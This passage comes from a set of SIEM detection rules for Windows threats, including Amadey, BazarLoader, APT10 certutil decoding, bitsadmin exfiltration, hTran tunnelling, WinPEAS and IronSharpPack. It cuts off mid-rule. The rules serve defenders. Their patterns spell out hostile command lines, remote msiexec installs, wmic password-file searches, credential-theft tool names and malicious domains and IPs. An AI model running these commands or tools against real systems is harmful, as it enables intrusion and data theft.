reference = "https://tdm.socprime.com/tdm/info/bwpRaR1KCq8h"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "T1053, T1081"
events:
($selection.principal.process.file.full_path = "8cab6413fdc97e9cc90607b3a49175a7.exe" and (re.regex($selection.target.process.file.full_path, `.*RegSvcs\.exe`) or $selection.target.process.file.full_path = "C:\\Windows\\System32\\schtasks.exe") and re.regex($selection.target.process.command_line, `.*/Create /TN \"Updates\\ZwqpnECNvoWf\" /XML \"C:\\Users\\admin\\AppData\\Local\\Temp\\tmp6CEB\.tmp\"`))
condition:
$selection
}amadey_botnet_detection_ta505
This rule detects a bot called Amadey. This one is used in order to collect information victim's environment, though it can also deliver other malware. The threat actor is considered TA505 License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule amadey_botnet_detection_ta505 {
meta:
author = "Ariel Millahuel"
description = "This rule detects a bot called Amadey. This one is used in order to collect information victim's environment, though it can also deliver other malware. The threat actor is considered TA505 License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/oETtTqqsUAmk"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "execution, T1059"
events:
($selection1.metadata.product_event_type = "13" and (re.regex($selection1.target.registry.registry_key, `.*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.*`) or re.regex($selection1.target.registry.registry_key, `.*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders.*`)) and (re.regex($selection1.metadata.description, `.* rundll32 C:\\Users.*\\AppData\\Local\\Temp\\cred\.dll, Main.*`) or re.regex($selection1.metadata.description, `.* rundll32 C:\\Users.*\\AppData\\Local\\Temp.*\.dll, Main.*`) or re.regex($selection1.metadata.description, `.*C:\\ProgramData\\87e4c89e95.*`) or re.regex($selection1.metadata.description, `.*C:\\ProgramData\\87.*`)))
condition:
$selection1
}amadey_botnet_detection_ta505_part_1
This rule detects a bot called Amadey. This one is used in order to collect information victim's environment, though it can also deliver other malware. The threat actor is considered TA505 License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule amadey_botnet_detection_ta505_part_1 {
meta:
author = "Ariel Millahuel"
description = "This rule detects a bot called Amadey. This one is used in order to collect information victim's environment, though it can also deliver other malware. The threat actor is considered TA505 License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/oETtTqqsUAmk"
version = "0.01"
created = "2021-03-09"
category = "process_creation"
product = "windows"
mitre = "execution, T1059"
events:
(($selection2.target.process.command_line = "rundll32.exe C:\\Users\\admin\\AppData\\Local\\Temp\\cred.dll, Main" or re.regex($selection2.target.process.command_line, `msiexec\.exe STOP=1 /i http://.*\..*\..*\..*/dom.* /q ksw=%TEMP%`) or re.regex($selection2.target.process.command_line, `msiexec\.exe STOP=1 /i https://.*\..*\..*\..*/dom.* /q ksw=%TEMP%`) or $selection2.target.process.command_line = "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\87e4c89e95" or re.regex($selection2.target.process.command_line, `REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\87.*`)) and ($selection2.metadata.product_event_type = "4688" or $selection2.metadata.product_event_type = "1"))
condition:
$selection2
}apt10_behavior
Detects an ATP10's technique that uses Windows \"certutil.exe\" functionality for payload decoding License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule apt10_behavior {
meta:
author = "Ariel Millahuel"
description = "Detects an ATP10's technique that uses Windows \"certutil.exe\" functionality for payload decoding License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/eG23WH8AEKB0"
version = "0.01"
created = "2021-03-09"
category = "process_creation"
product = "windows"
mitre = "execution, T1059"
events:
(($selection1.metadata.product_event_type = "4688" or $selection1.metadata.product_event_type = "1") and (($selection1.target.process.file.full_path = "cmd.exe" and (re.regex($selection1.target.process.command_line, `.*/c certutil -decode C:\\ProgramData\\padre1\.txt C:\\ProgramData.*\\GUP\.txt.*`) or re.regex($selection1.target.process.command_line, `.*/c certutil -decode C:\\ProgramData\\padre2\.txt C:\\ProgramData.*\\libcurl\.txt.*`) or re.regex($selection1.target.process.command_line, `.* /c certutil -decode C:\\ProgramData\\padre3\.txt C:\\ProgramData.*\\3F2E3AB9 .*`))) or ($selection1.target.process.file.full_path = "esentutl.exe" and (re.regex($selection1.target.process.command_line, `.* /y C:\\ProgramData.*\\GUP\.txt /d C:\\ProgramData\\GUP\.exe /o .*`) or re.regex($selection1.target.process.command_line, `.* /y C:\\ProgramData.*\\libcurl\.txt /d C:\\ProgramData\\libcurl\.dll /o .*`)))))
condition:
$selection1
}atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal
Detects Atlassian Confluence RCE via Attachment Download. Sample regex added to detect directory traversal, it can be improved. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal {
meta:
author = "Halil Ibrahim Cosgun"
description = "Detects Atlassian Confluence RCE via Attachment Download. Sample regex added to detect directory traversal, it can be improved. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/pCBpTAya0HBi"
version = "0.01"
created = "2021-03-09"
product = "proxy"
mitre = "initial_access, persistence, privilege_escalation, T1190, T1100"
events:
($selection.network.http.method = "POST" and re.regex($selection.target.url, `/plugins/drag-and-drop/upload\.action\?pageId.*&filename=^\(\?!\..*\\/\.\\/\.\)\.{0,200}$.*&size=.*&mimeType=.*atl_token=.*&name=^\(\?!\..*\\/\.\\/\.\)\.{0,200}$.*`))
condition:
$selection
}backdoor_detection_on_sql_servers
An attack targeting the aviation industry has been identified. You can detect the url and ip list of this attack by installing backdoor on SQL servers on your system. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule backdoor_detection_on_sql_servers {
meta:
author = "Furkan Celik"
description = "An attack targeting the aviation industry has been identified. You can detect the url and ip list of this attack by installing backdoor on SQL servers on your system. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/Ov3SO6d6u76i"
version = "0.01"
created = "2020/04/01"
product = "proxy"
mitre = "T1086, T1083, T1132, T1088"
events:
(($selection.target.url = "a.vollar.ga" or $selection.target.url = "aa.vollar.ga" or $selection.target.url = "b.vollar.ga" or $selection.target.url = "c.vollar.ga" or $selection.target.url = "ca.vollar.gad.vollar.ga" or $selection.target.url = "da.vollar.ga" or $selection.target.url = "f.vollar.ga" or $selection.target.url = "h.vollar.ga" or $selection.target.url = "ja.vollar.ga" or $selection.target.url = "k.vollar.ga" or $selection.target.url = "m.vollar.ga" or $selection.target.url = "ma.vollar.ga" or $selection.target.url = "n.vollar.ga" or $selection.target.url = "na.vollar.ga" or $selection.target.url = "o.vollar.ga" or $selection.target.url = "oa.vollar.ga" or $selection.target.url = "ob.vollar.ga" or $selection.target.url = "s.vollar.ga" or $selection.target.url = "sa.vollar.ga" or $selection.target.url = "t.vollar.ga" or $selection.target.url = "ta.vollar.ga" or $selection.target.url = "v.vollar.ga" or $selection.target.url = "x.vollar.ga" or $selection.target.url = "xa.vollar.ga" or $selection.target.url = "z.vollar.ga") and ($selection.principal.ip = "183.131.3.196" or $selection.principal.ip = "192.37.90.118" or $selection.principal.ip = "39.109.116.162" or $selection.principal.ip = "154.221.26.108" or $selection.principal.ip = "103.53.211.94" or $selection.principal.ip = "185.172.66.203" or $selection.principal.ip = "51.105.249.223" or $selection.principal.ip = "154.211.14.66" or $selection.principal.ip = "154.221.19.221" or $selection.principal.ip = "145.239.23.7" or $selection.principal.ip = "180.97.220.5" or $selection.principal.ip = "207.180.202.208"))
condition:
$selection
}bazar_loader_detection_sysmon_detection
BazarLoader (also known as Bazar Loader, Bazar Backdoor or Team9 Backdoor) is a module of the dreaded TrickBot Trojan. It is mostly used to gain a foothold in compromised enterprise networks License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule bazar_loader_detection_sysmon_detection {
meta:
author = "Ariel Millahuel"
description = "BazarLoader (also known as Bazar Loader, Bazar Backdoor or Team9 Backdoor) is a module of the dreaded TrickBot Trojan. It is mostly used to gain a foothold in compromised enterprise networks License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/QDvyH85txiBA"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "execution, T1059"
events:
($selection1.metadata.product_event_type = "11" and (re.regex($selection1.target.file.full_path, `.*DD45\.exe.*`) or re.regex($selection1.target.file.full_path, `.*BthCxn\.exe.*`) or re.regex($selection1.target.file.full_path, `.*v86\.exe_.*`)))
condition:
$selection1
}burp_suite_scanner_and_burp_collaborator_detected_via_proxy
Burp Suite Scanner Activirt Detected via Proxy License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule burp_suite_scanner_and_burp_collaborator_detected_via_proxy {
meta:
author = "Emir Erdogan"
description = "Burp Suite Scanner Activirt Detected via Proxy License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/QhIyqc5Qdl6m"
version = "0.01"
created = "2021-03-09"
category = "proxy"
mitre = "T1190, T1210"
events:
re.regex($selection.target.url, `.*burpcollaborator.*`)
condition:
$selection
}certutil_activity_via_proxy
This rule can be used to hunt for Living of the Land activity from certutil from proxy server logs. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule certutil_activity_via_proxy {
meta:
author = "Joseph Kamau"
description = "This rule can be used to hunt for Living of the Land activity from certutil from proxy server logs. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/E64jgRkkRkTS"
version = "0.01"
created = "2021-03-09"
product = "proxy"
mitre = "command&control, T1105, defense-evasion, T1140"
events:
($selection.principal.application = "CertUtil URL Agent" or re.regex($selection.principal.application, `Microsoft-CryptoAPI/.*`))
condition:
$selection
}covid19_phishing_campaign_fake_world_health_organization
Coronovirus themed malware is downloaded via fake WHO phsihing email License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule covid19_phishing_campaign_fake_world_health_organization {
meta:
author = "Emir Erdogan"
description = "Coronovirus themed malware is downloaded via fake WHO phsihing email License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/xyaUex2Ka9Lq"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "T1129, T1060, T1053, T1059"
events:
(($selection1.principal.process.file.full_path = "C:\\Windows\\system32\\cmd.exe" and (($selection1.target.process.file.full_path = "C:\\Windows\\system32\\findstr.exe" and re.regex($selection1.target.process.command_line, `findstr\.exe \"TVNDRgAAAA\" .*\\AppData\\Local\\Temp\\\\g4ZokyumBB2gDn\.tmp`)) or (re.regex($selection1.target.process.file.full_path, `.*\\AppData\\Local\\Temp\\msoia\.exe`) and re.regex($selection1.target.process.command_line, `.*\\AppData\\Local\\Temp\\\\msoia\.exe -decode .*AppData\\Local\\Temp\\\\cSi1r0uywDNvDu\.tmp .*\\AppData\\Local\\Temp\\\\oGhPGUDC03tURV\.tmp`)))) or (re.regex($selection1.target.process.file.full_path, `.*\\OFFICE12\\Wordcnvpxy\.exe`) and re.regex($selection1.principal.process.file.full_path, `.*MSOSTYLE\.exe`)))
condition:
$selection1
}covid19_themed_malware_via_chm_file
rundll32 downloads covid-19 malware over chm file License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule covid19_themed_malware_via_chm_file {
meta:
author = "Emir Erdogan"
description = "rundll32 downloads covid-19 malware over chm file License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/n0COmCxxqXD5"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "T1059, T1204, T1012"
events:
(($selection1.target.process.file.full_path = "C:\\Windows\\System32\\cmd.exe" and $selection1.principal.process.file.full_path = "C:\\Windows\\hh.exe" and re.regex($selection1.target.process.command_line, `.*for %i in \(.*\.chm\) do \(hh -decompile %temp% %~i\)&&cmd /c %temp%/~tmp6\.cab`)) or ($selection1.principal.process.file.full_path = "C:\\Windows\\System32\\cmd.exe" and $selection1.target.process.file.full_path = "C:\\Windows\\hh.exe" and re.regex($selection1.target.process.command_line, `hh -decompile .*COVID-19\.chm.*`)))
condition:
$selection1
}data_exfiltration_attempt_via_bitsadmin
Using bitsadmin to exfiltrate data License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule data_exfiltration_attempt_via_bitsadmin {
meta:
author = "Emir Erdogan"
description = "Using bitsadmin to exfiltrate data License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/HjIK6Euup7w0"
version = "0.01"
created = "2021-03-09"
category = "sysmon"
product = "windows"
mitre = "T1020, T1041, T1011"
events:
(re.regex($selection.target.process.file.full_path, `.*\\bitsadmin\.exe`) and re.regex($selection.target.process.command_line, `.*bitsadmin\.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY.*`))
condition:
$selection
}data_exfiltration_detection_with_htran
Similar to most of cyber espionage groups, APT10 is main goal is to exfiltrate critical data from victim is environment. In order to exfiltrate data from the victim is network segment that is not connected to internet, a bridge tool is needed to redirect ports and connections between two network segments. In this case threat group deployed hTran to achieve the same functionality. Over the past years we observed Chinese threata groups using htran in their attacks against world. This executable file was seen as java.exe on compromised hosts License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule data_exfiltration_detection_with_htran {
meta:
author = "Furkan Celik"
description = "Similar to most of cyber espionage groups, APT10 is main goal is to exfiltrate critical data from victim is environment. In order to exfiltrate data from the victim is network segment that is not connected to internet, a bridge tool is needed to redirect ports and connections between two network segments. In this case threat group deployed hTran to achieve the same functionality. Over the past years we observed Chinese threata groups using htran in their attacks against world. This executable file was seen as java.exe on compromised hosts License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/CBsRA1zfmrfE"
version = "0.01"
created = "2020/04/12"
product = "windows"
service = "security"
mitre = "T1041, Exfiltration"
events:
(re.regex($selection.target.process.command_line, `.*java\.exe %% 1936 0x199c .*java\.exe -ht listenip:8080 -hu username -hp password C&C:443 NULL SID -- 0x0`) and $selection.metadata.product_event_type = "1" and re.regex($selection.target.process.file.full_path, `.*java\.exe`))
condition:
$selection
}detection_of_safetykatz
Detects possible SafetyKatz Behaviour License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule detection_of_safetykatz {
meta:
author = "Markus Neis"
description = "Detects possible SafetyKatz Behaviour License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/bx1gtxYzjwHz"
version = "0.01"
created = "2018/07/24"
product = "windows"
service = "sysmon"
mitre = "credential_access, T1003"
events:
($selection.metadata.product_event_type = "11" and re.regex($selection.target.file.full_path, `.*\\Temp\\debug\.bin`))
condition:
$selection
}ekanssnake_ransomware_sysmon_detection
EKANS/SNAKE is a Malware that attempts to attack ICS (Industrial Control Systems) environments License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule ekanssnake_ransomware_sysmon_detection {
meta:
author = "Ariel Millahuel"
description = "EKANS/SNAKE is a Malware that attempts to attack ICS (Industrial Control Systems) environments License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/NaOKwNFrbyKd"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "defense_evasion, T1112"
events:
($selection1.metadata.product_event_type = "13" and (re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\LruList\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\LruList\\00000000000002FC\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\ObjectTable\\E8\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\ObjectTable\\E9\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\.*`)))
condition:
$selection1
}fallout_rig_ek_delivers_raccoon_stealer
Raccoon Stealer License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule fallout_rig_ek_delivers_raccoon_stealer {
meta:
author = "Emir Erdogan"
description = "Raccoon Stealer License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/9lYIAZKxCWzK"
version = "0.01"
created = "2019/11/24"
product = "windows"
service = "sysmon"
mitre = "T1140, T1059, T1005, T1022, T1105, T1057"
events:
(((re.regex($selection1.target.process.file.full_path, `.*\\cvtres\.exe`) and re.regex($selection1.principal.process.file.full_path, `.*\\csc\.exe`)) or ($selection1.metadata.product_event_type = "1" and (re.regex($selection1.target.process.file.full_path, `.*\\csc\.exe`) or re.regex($selection1.target.process.file.full_path, `.*\\AyJWa1N0\.tmp`)) and re.regex($selection1.principal.process.file.full_path, `.*\\powershell\.exe`))) or (re.regex($selection1.target.process.file.full_path, `.*\\cmd\.exe`) and re.regex($selection1.principal.process.file.full_path, `.*\\AyJWa1N0\.tmp`)))
condition:
$selection1
}hacktool_ironsharp_pack_execution
Detects the execution of known attacker tools, including but not limited to those in the IronSharpPack toolset. These tools are commonly used for offensive security operations and may indicate malicious activity if observed in unauthorized environments.
Show query
rule hacktool_ironsharp_pack_execution {
meta:
author = "Georg Lauenstein - suresecure GmbH"
description = "Detects the execution of known attacker tools, including but not limited to those in the IronSharpPack toolset. These tools are commonly used for offensive security operations and may indicate malicious activity if observed in unauthorized environments."
rule_id = "mr_34f2ecef-cd3e-4dee-9c83-b7a9ec34becc"
rule_name = "Hacktool - IronSharpPack Execution"
tactic = "TA0002"
technique = "T1059"
references = "https://github.com/BC-SECURITY/IronSharpPack"
type = "alert"
platform = "Linux, Windows, EDR"
data_source = "Sysmon for Linux, Microsoft Sysmon, Windows Event Logs"
severity = "Medium" // Adjust based on your risk assessment
priority = "Medium" // Adjust based on your incident response process
events:
$ironsharp_execution.metadata.event_type = "PROCESS_LAUNCH"
$ironsharp_execution.target.process.file.full_path = /cmd\.exe|python.*\.exe|ipy\.exe|powershell\.exe|pwsh\.exe|wsl\.exe/ nocase and
$ironsharp_execution.target.process.command_line = /IronADCSPwn\.py|IronADFSDump\.py|IronBetterSafetyKatz\.py|IronCertify\.py|IronDeployPrinterNightmare\.py|IronEmbed\.py|IronEDD\.py|IronGrouper2\.py|IronInveigh\.py|IronLockLess\.py|IronPassTheCert\.py|IronRubeus\.py|IronSafetyKatz\.py|IronSearchOutlook\.py|IronSeatbelt\.py|IronSharPersist\.py|IronSharp-SMBExec\.py|IronSharpAllowedToAct\.py|IronSharpBypassUAC\.py|IronSharpCOM\.py|IronSharpChisel\.py|IronSharpChrome\.py|IronSharpChromium\.py|IronSharpCloud\.py|IronSharpCookieMonster\.py|IronSharpCrashEventLog\.py|IronSharpDPAPI\.py|IronSharpDir\.py|IronSharpDoor\.py|IronSharpDump\.py|IronSharpEDRChecker\.py|IronSharpExec\.py|IronSharpGPOAbuse\.py|IronSharpHandler\.py|IronSharpKatz\.py|IronSharpLAPS\.py|IronSharpMapExec\.py|IronSharpMiniDump\.py|IronSharpMove\.py|IronSharpNamedPipePTH\.py|IronSharpReg\.py|IronSharpSQLPwn\.py|IronSharpSearch\.py|IronSharpSecDump\.py|IronSharpSniper\.py|IronSharpSpray\.py|IronSharpStay\.py|IronSharpTask\.py|IronSharpUp\.py|IronSharpWMI\.py|IronSharpWebServer\.py|IronSharpWifiGrabber\.py|IronSharpZeroLogon\.py|IronShhmon\.py|IronSqlClient\.py|IronStandIn\.py|IronStickyNotesExtract\.py|IronThunderFox\.py|IronTokenStomp\.py|IronWMIReg\.py|IronWatson\.py|Iron_RunasCs\.py|Ironscout\.py|Ironsharpfiles\.py|Ironsharpshares\.py/ nocase
// Capture the hostname where the event occurred
$ironsharp_execution.principal.hostname = $hostname
match:
$hostname over 15m
outcome:
$risk_score = max(65)
$event_count = count_distinct($ironsharp_execution.metadata.id)
$principal_process_pid = array_distinct($ironsharp_execution.principal.process.pid)
$principal_process_command_line = array_distinct($ironsharp_execution.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($ironsharp_execution.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($ironsharp_execution.principal.process.file.full_path)
$principal_process_product_specific_process_id = array_distinct($ironsharp_execution.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specific_process_id = array_distinct($ironsharp_execution.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($ironsharp_execution.target.process.pid)
$target_process_command_line = array_distinct($ironsharp_execution.target.process.command_line)
$target_process_file_sha256 = array_distinct($ironsharp_execution.target.process.file.sha256)
$target_process_file_full_path = array_distinct($ironsharp_execution.target.process.file.full_path)
$target_process_product_specific_process_id = array_distinct($ironsharp_execution.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($ironsharp_execution.principal.user.userid)
condition:
$ironsharp_execution
}hacktool_purpleknight_execution
This detection rule identifies the execution of the Purple Knight tool, a free Active Directory security assessment utility developed by Semperis. Purple Knight is designed to scan for AD vulnerabilities, misconfigurations, and common attack paths. While it is a legitimate tool used by defenders, its execution in production environments may also indicate red team activity or unauthorized reconnaissance by adversaries attempting to map domain weaknesses.
Show query
rule hacktool_purpleknight_execution {
meta:
author = "Georg Lauenstein - suresecure GmbH"
description = "This detection rule identifies the execution of the Purple Knight tool, a free Active Directory security assessment utility developed by Semperis. Purple Knight is designed to scan for AD vulnerabilities, misconfigurations, and common attack paths. While it is a legitimate tool used by defenders, its execution in production environments may also indicate red team activity or unauthorized reconnaissance by adversaries attempting to map domain weaknesses."
rule_id = "mr_69e428bb-c946-4e3f-abb8-0e28316f2389"
rule_name = "Purple Knight Tool Execution Detected"
tactic = "TA0007"
technique = "T1087"
references = "https://www.purple-knight.com/"
type = "alert"
platform = "Windows, EDR"
data_source = "Microsoft Sysmon, Windows Event Logs"
severity = "Medium" // Adjust based on your risk assessment
priority = "Medium" // Adjust based on your incident response process
events:
$purple_knight.metadata.event_type = "PROCESS_LAUNCH"
(
$purple_knight.target.process.file.full_path = /\\PurpleKnight\.exe$/ nocase or
$purple_knight.principal.process.file.full_path = /\\PurpleKnight\.exe$/ nocase or
$purple_knight.principal.process.command_line = /PurpleKnight/ nocase
)
// Capture the hostname where the event occurred
$purple_knight.principal.hostname = $hostname
match:
$hostname over 10m
outcome:
$risk_score = max(65)
$event_count = count_distinct($purple_knight.metadata.id)
$principal_process_pid = array_distinct($purple_knight.principal.process.pid)
$principal_process_command_line = array_distinct($purple_knight.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($purple_knight.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($purple_knight.principal.process.file.full_path)
$principal_process_product_specific_process_id = array_distinct($purple_knight.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specific_process_id = array_distinct($purple_knight.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($purple_knight.target.process.pid)
$target_process_command_line = array_distinct($purple_knight.target.process.command_line)
$target_process_file_sha256 = array_distinct($purple_knight.target.process.file.sha256)
$target_process_file_full_path = array_distinct($purple_knight.target.process.file.full_path)
$target_process_product_specific_process_id = array_distinct($purple_knight.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($purple_knight.principal.user.userid)
condition:
$purple_knight
}hacktool_winpeas_execution_patterns
This detection rule identifies the execution of WinPEAS (Windows Privilege Escalation Awesome Script), a post-exploitation reconnaissance tool used to discover privilege escalation paths on Windows systems. WinPEAS performs a wide range of local enumeration checks, including service misconfigurations, permission issues, token privileges, and more. Its usage is commonly observed during red team assessments and by adversaries seeking to elevate privileges after gaining initial access. WinPEAS checks are well-documented in the HackTricks knowledge base.
Show query
rule hacktool_winpeas_execution_patterns {
meta:
author = "Georg Lauenstein - suresecure GmbH"
description = "This detection rule identifies the execution of WinPEAS (Windows Privilege Escalation Awesome Script), a post-exploitation reconnaissance tool used to discover privilege escalation paths on Windows systems. WinPEAS performs a wide range of local enumeration checks, including service misconfigurations, permission issues, token privileges, and more. Its usage is commonly observed during red team assessments and by adversaries seeking to elevate privileges after gaining initial access. WinPEAS checks are well-documented in the HackTricks knowledge base."
rule_id = "mr_9c9ad668-485a-4b10-b85d-36ba63546304"
rule_name = "Hacktool - WinPEAS Execution Patterns"
tactic = "TA0007"
technique = "T1082"
references = "https://github.com/carlospolop/PEASS-ng, https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html, https://www.microsoft.com/en-us/security/blog/2022-10-14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/, https://www.logpoint.com/wp-content/uploads/2023/02/emerging-threats-the-play-report.pdf"
type = "alert"
platform = "Windows, EDR"
data_source = "Microsoft Sysmon, Windows Event Logs"
severity = "Medium" // Adjust based on your risk assessment
priority = "Medium" // Adjust based on your incident response process
events:
$winpeas_execution.metadata.event_type = "PROCESS_LAUNCH"
and
(
$winpeas_execution.src.process.file.full_path = /winPEAS.exe|winPEASany.exe|winPEASany_ofs.exe|winPEASx64.exe|winPEASx64_ofs.exe|winPEASx86.exe|winPEASx86_ofs.exe/ nocase or
$winpeas_execution.target.process.file.full_path = /\\winPEAS\.exe|\\winPEASany\.exe|\\winPEASany_ofs\.exe|\\winPEASx64\.exe|\\winPEASx64_ofs\.exe|\\winPEASx86\.exe|\\winPEASx86_ofs\.exe/ nocase or
$winpeas_execution.target.process.command_line = /processinfo|servicesinfo|applicationsinfo|networkinfo|windowscreds|browserinfo|filesinfo|fileanalysis|eventsinfo/ nocase
or
(
$winpeas_execution.target.process.command_line = /raw\.githubusercontent\.com/ nocase and
$winpeas_execution.target.process.command_line = /carlospolop/ nocase and
$winpeas_execution.target.process.command_line = /winPEAS\.ps1/ nocase
)
or
(
$winpeas_execution.principal.process.command_line = / -linpeas$/ nocase or
$winpeas_execution.target.process.command_line = / -linpeas$/ nocase
)
)
not
(
// Exclusion: Microsoft Defender Threat Protection Sensor Updates
$winpeas_execution.additional.fields["current_directory"] = "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\"
)
// Capture the hostname where the event occurred
$winpeas_execution.principal.hostname = $hostname
match:
$hostname over 10m
outcome:
$risk_score = max(65)
$event_count = count_distinct($winpeas_execution.metadata.id)
$principal_process_pid = array_distinct($winpeas_execution.principal.process.pid)
$principal_process_command_line = array_distinct($winpeas_execution.principal.process.command_line)
$principal_process_file_sha256 = array_distinct($winpeas_execution.principal.process.file.sha256)
$principal_process_file_full_path = array_distinct($winpeas_execution.principal.process.file.full_path)
$principal_process_product_specific_process_id = array_distinct($winpeas_execution.principal.process.product_specific_process_id)
$principal_process_parent_process_product_specific_process_id = array_distinct($winpeas_execution.principal.process.parent_process.product_specific_process_id)
$target_process_pid = array_distinct($winpeas_execution.target.process.pid)
$target_process_command_line = array_distinct($winpeas_execution.target.process.command_line)
$target_process_file_sha256 = array_distinct($winpeas_execution.target.process.file.sha256)
$target_process_file_full_path = array_distinct($winpeas_execution.target.process.file.full_path)
$target_process_product_specific_process_id = array_distinct($winpeas_execution.target.process.product_specific_process_id)
$principal_user_userid = array_distinct($winpeas_execution.principal.user.userid)
condition:
$winpeas_execution
}hostdomain_enumeration_with_wmic
Detects the Host/Domain Enumeration Attempts. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule hostdomain_enumeration_with_wmic {
meta:
author = "Osman Demir"
description = "Detects the Host/Domain Enumeration Attempts. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/tZIBjTZedRxS"
version = "0.01"
created = "2021-03-09"
product = "windows"
service = "sysmon"
mitre = "discovery, T1082, T1083, T1087"
events:
(($selection.target.process.file.full_path = "cmd.exe" or $selection.target.process.file.full_path = "powershell.exe") and ($selection.target.process.command_line = "wmic os LIST Full" or $selection.target.process.command_line = "wmic computersystem LIST full" or $selection.target.process.command_line = "wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct" or $selection.target.process.command_line = "wmic path Win32_PnPdevice" or $selection.target.process.command_line = "wmic qfe list brief" or re.regex($selection.target.process.command_line, `wmic DATAFILE where \"path='\\\\Users\\\\test\\\\Documents\\\\'\" GET .*`) or re.regex($selection.target.process.command_line, `wmic DATAFILE where \"drive='C:' AND Name like '%password%'\" GET .*`) or re.regex($selection.target.process.command_line, `wmic USERACCOUNT Get .*`) or $selection.target.process.command_line = "wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE" or re.regex($selection.target.process.command_line, `wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_user where .*`) or $selection.target.process.command_line = "wmic 